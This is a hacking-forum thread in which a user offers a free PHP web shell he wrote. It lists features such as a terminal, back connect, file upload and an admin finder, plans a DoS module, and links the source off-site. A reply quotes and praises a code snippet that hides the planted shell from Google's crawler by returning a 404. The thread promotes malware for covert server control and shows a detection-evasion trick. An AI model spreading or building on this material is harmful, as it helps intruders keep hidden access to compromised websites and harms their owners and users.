Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
[OutDated] - Free G6 Web PHP Shell - Coded by Mr. P-teo
  • Mr. P-teoMr. P-teo
    Posts: 269
    So, a while back i started working on a PHP shell as i wanted to improve my PHP knowledge, so far its been private with only a few testing the shell. i plan to add many more features but
    currently i want to get some opinions of my work so far, and what could be added. I know there is an issue with the upload, im working on it. And i haven't managed to bypass "GET Method not implemented" yet.

     So Here are some screenshots.


    image


    Features
    File Explore
    Read File Source Code
    File Upload
    Teminal
    Back Connect
    Server Information
    Hash Identifier
    Admin Finder


    Going to be adding:
    Web-Based Proxy Browser
    Dos
    Symlink


    Here is the source - http://pastebin.com/kTweecrm

    Note i will be updating it soon.

    Skype: mrpt3o
    Twitter: MrPteo


    image
  • m0rph
    Posts: 332
    This looks great man! Excellent job! Also....this part of your code:

    1. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    2.     header('HTTP/1.0 404 Not Found');
    3.     exit;
    4. }

    was probably the best idea I have ever seen for a webshell. Really awesome job man!
    while( !(succeed = try() ) );
  • Mr. P-teoMr. P-teo
    Posts: 269
    Thanks very much, yer added that to stop damn google helping noobs think they are awesome hackers.
    Skype: mrpt3o
    Twitter: MrPteo


    image